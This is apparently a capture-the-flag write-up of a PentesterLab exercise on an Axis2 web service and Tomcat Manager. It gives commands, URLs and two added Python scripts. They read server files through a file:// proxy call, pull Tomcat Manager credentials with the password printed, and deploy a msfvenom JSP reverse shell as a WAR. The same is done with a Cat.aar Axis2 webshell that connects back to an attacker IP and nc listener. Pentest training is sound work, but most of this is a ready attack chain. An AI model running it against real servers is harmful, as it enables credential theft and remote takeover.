Pentesterlab--Axis2 Web Service and Tomcat Manager

When you engage in actual fighting, if victory is long in coming, then men’s weapons will grow dull and their ardor will be damped. If you lay siege to a town, you will exhaust your strength. — The Art of War

This course details the exploitation of an issue in an Axis2 Web service and how, using this issue, it is possible to retrieve arbitrary files. Then, using this, we will see how an attacker can retrieve the Tomcat users' file to access the Tomcat Manager and gain command execution on the server. —Pentesterlab

Difficulty: 3/5

Forces:

  • Nmap
  • wfuzz
  • nc
  • msfvenom

Detail Assessment and Planning

  • Port scan to identify open ports, running services and their versions. —Nmap
  • Brute force hidden paths on the server. —wfuzz
  • Generate a JSP webshell. —msfvenom
  • Catch the reverse shell. —nc
  • Webshell packaged as an Axis2 service archive. —Cat.aar

Waging War

Weaknesses and Strengths

Use Nmap to identify open ports. TCP port 80 is open and an Apache HTTP service is running on it.

nmap -sV -v -A 192.168.79.168

Use wfuzz to brute force hidden paths on the server (responses with status 404 are hidden):

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.79.168/FUZZ 2>/dev/null

Now we find that the server hosts a web service built on Axis2.

To test whether the web server is running Tomcat, request a page that does not exist and inspect the 404 error page: Tomcat's default error page names the server and its version.

Now we know the server runs Tomcat, and we have its version. Keep going…

Let's check the path /axis2/; we get the following page:

Get the list of available services by visiting http://192.168.79.168/axis2/services/listServices or by clicking the Services link.

The WSDL of a service can be accessed by clicking the service's name on the listServices page, or directly with the following URL: http://192.168.79.168/axis2/services/ProxyService?wsdl.

We can see that a get operation is defined in the WSDL, and that it takes a uri parameter.

Axis2 also exposes each service over plain HTTP GET (REST style), so an operation can be called without a SOAP envelope by following the pattern http://[WS_URL]/method?parameter=value

Attack

Easy way

Read the Tomcat Manager configuration to get login credentials. On Debian, the Tomcat 6 package keeps its user file, tomcat-users.xml, at /etc/tomcat6/tomcat-users.xml.

So we can ask the proxy's get operation to open a file:// URI:

http://192.168.79.168/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcat-users.xml

The response contains the Tomcat Manager credentials: the account with the manager-gui role is username manager, password !mp0ss!bl32gu355.
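As an added example (not part of the PentesterLab course or of this post), the following Python script automates the two steps above: it builds the REST-style call to the ProxyService get operation with a file:// URI, and pulls the Manager accounts out of the returned tomcat-users.xml. The target URL and the manager account are the ones reported here; the element names of the Axis2 response in the sample, and the extra user in the sample XML, are assumptions constructed for the offline demo.

```python
from __future__ import annotations

import html
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# Target and service path from the write-up.
AXIS2_BASE = "http://192.168.79.168/axis2/services/ProxyService"

# Roles that open the Tomcat Manager: the all-in-one "manager" role of
# Tomcat 6 before 6.0.30, and the split manager-gui (HTML UI) and
# manager-script (text interface) roles used since.
MANAGER_ROLES = {"manager", "manager-gui", "manager-script"}


def axis2_get_url(base: str, uri: str) -> str:
    """Build the REST-style call <service>/get?uri=<value>.  The value is
    percent-encoded so characters such as '#', '?' or '&' inside the
    requested URI cannot split the query string."""
    return f"{base}/get?uri={urllib.parse.quote(uri, safe='')}"


def read_remote_file(base: str, path: str, timeout: float = 10.0) -> str:
    """Fetch a file from the target by asking the proxy's get operation to
    open a file:// URI.  Returns the raw HTTP body, i.e. the Axis2
    response element with the file content inside it."""
    url = axis2_get_url(base, "file://" + path)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_payload(body: str) -> str:
    """Pull the returned string out of the Axis2 response.  Assumption: the
    service returns the file as the text of one element, entity-escaped;
    ElementTree unescapes it, so the result is the file verbatim."""
    root = ET.fromstring(body)
    for elem in root.iter():
        if elem.text and elem.text.strip():
            return elem.text
    return ""


def parse_tomcat_users(xml_text: str) -> list[dict]:
    """Return every <user> in a tomcat-users.xml as a dict with username,
    password and a set of roles."""
    users = []
    for elem in ET.fromstring(xml_text).iter():
        if elem.tag.split("}")[-1] != "user":   # tolerate a namespaced file
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        users.append({
            "username": elem.get("username") or elem.get("name"),
            "password": elem.get("password"),
            "roles": roles,
        })
    return users


def manager_accounts(users: list[dict]) -> list[dict]:
    """Keep only the accounts that can log in to the Tomcat Manager."""
    return [u for u in users if u["roles"] & MANAGER_ROLES]


# Constructed sample of the file the course retrieves: the manager account
# matches what the write-up reports, the other entries are illustrative.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="utf-8"?>
<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="tomcat"/>
  <user username="tomcat" password="tomcat" roles="tomcat"/>
  <user username="manager" password="!mp0ss!bl32gu355" roles="manager-gui"/>
</tomcat-users>
"""

# Constructed stand-in for the Axis2 response body (element names assumed).
SAMPLE_RESPONSE = (
    '<ns:getResponse xmlns:ns="http://example.invalid/proxy"><ns:return>'
    + html.escape(SAMPLE_TOMCAT_USERS)
    + "</ns:return></ns:getResponse>"
)


if __name__ == "__main__":
    # Offline demo on the constructed sample.  Against the lab box you would
    # call: body = read_remote_file(AXIS2_BASE, "/etc/tomcat6/tomcat-users.xml")
    print(axis2_get_url(AXIS2_BASE, "file:///etc/tomcat6/tomcat-users.xml"))
    for acct in manager_accounts(parse_tomcat_users(extract_payload(SAMPLE_RESPONSE))):
        print(acct["username"], acct["password"], sorted(acct["roles"]))
```

A body fetched from the lab box goes through extract_payload before parse_tomcat_users. The root cause this automates is that the proxy service opens whatever scheme it is handed; the fix on the server side is to allow only http and https before opening the URI.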

Then log in to the Tomcat Manager at http://192.168.79.168/manager/html and upload a WAR file containing a JSP webshell.

deploy webshell

Generate the webshell and package it as a WAR:

$ mkdir webshell
$ cd webshell
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.79.156 LPORT=4444 -f raw > sh4.jsp
$ jar -cvf ../webshell.war *

Then upload webshell.war through the manager page ("WAR file to deploy"); it is deployed under the context path /webshell.

On the Kali box, start a listener on the port given to msfvenom:

nc -nlvp 4444

Then request http://192.168.79.168/webshell/sh4.jsp

and the reverse shell connects back:
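As an added example (not part of the PentesterLab course or of this post), the following Python script does the packaging and the upload from the previous steps without jar or the browser: it builds the same minimal WAR in memory and sends it through the Manager's script interface. The host, account and context path are the ones used here; the JSP source is a constructed placeholder for the msfvenom-generated sh4.jsp.

```python
import base64
import io
import urllib.request
import zipfile

# Constructed placeholder standing in for the msfvenom-generated sh4.jsp:
# swap in the real payload bytes before deploying against the lab.
PLACEHOLDER_JSP = b'<%@ page language="java" %><%= "deployed" %>'

# Values reported in the write-up.
MANAGER_HOST = "http://192.168.79.168"
MANAGER_USER = "manager"
MANAGER_PASS = "!mp0ss!bl32gu355"


def build_war(jsp_name: str, jsp_source: bytes) -> bytes:
    """Produce a minimal WAR in memory: a zip with a MANIFEST (what `jar -cvf`
    adds) and the JSP at the archive root, so after deployment it answers at
    /<context>/<jsp_name>.  Tomcat compiles the JSP on first request; no
    web.xml is needed for that."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war_bytes: bytes) -> list:
    """List the archive members, a quick sanity check before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.namelist()


def basic_auth_header(username: str, password: str) -> str:
    """HTTP Basic credential as the Manager expects it."""
    return "Basic " + base64.b64encode(f"{username}:{password}".encode()).decode()


def deploy_request(host, username, password, context_path, war_bytes,
                   manager_prefix="/manager"):
    """Build the PUT that deploys a WAR through the Manager's script
    interface.  Tomcat 6 serves it at /manager/deploy; Tomcat 7 and later
    moved it to /manager/text/deploy (pass manager_prefix="/manager/text").
    Caveat: on Tomcat 6.0.30+ and 7+ this endpoint requires the
    manager-script role; an account holding only manager-gui, like the one
    recovered above, must use the /manager/html upload form instead."""
    url = f"{host}{manager_prefix}/deploy?path={context_path}"
    req = urllib.request.Request(url, data=war_bytes, method="PUT")
    req.add_header("Authorization", basic_auth_header(username, password))
    req.add_header("Content-Type", "application/octet-stream")
    return req


def deploy(req: urllib.request.Request, timeout: float = 30.0) -> str:
    """Send the request; Tomcat replies 'OK - Deployed application at context
    path /webshell' on success and 'FAIL - ...' otherwise."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    war = build_war("sh4.jsp", PLACEHOLDER_JSP)
    with open("webshell.war", "wb") as f:
        f.write(war)                      # same artifact `jar -cvf` produced
    print(war_entries(war))
    # Against the lab (with a manager-script account and nc listening):
    # print(deploy(deploy_request(MANAGER_HOST, MANAGER_USER, MANAGER_PASS, "/webshell", war)))
```

After a successful deploy the JSP is reachable at /webshell/sh4.jsp exactly as in the manual method, so the nc listener must already be running when it is requested.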

‘Hard’ way

On Debian, the Axis2 configuration file axis2.xml lives inside the Axis2 webapp, at /var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml.

So we can read it the same way:

http://192.168.79.168/axis2/services/ProxyService/get?uri=file:///var/lib/tomcat6/webapps/axis2/WEB-INF/conf/axis2.xml

In axis2.xml we find the admin console credentials, admin/axis2 (Axis2's defaults).

Then log in to the Axis2 admin console at http://192.168.79.168/axis2/axis2-admin/

and try to upload the webshell.war from the previous method.

It looks like the upload does not accept the WAR format: the admin console's upload expects an Axis2 service archive (.aar), not a WAR. WTF, okay, try harder.

After a Google search, I found a webshell packaged as an Axis2 service archive, called Cat.aar.

Download it and upload it through the admin console. Its Cat service exposes a shell operation that takes the IP and port of a listener (start nc -nlvp 6666 on the attacking host first):

http://192.168.79.168/axis2/services/Cat/shell?host=192.168.79.156&port=6666

Oh…..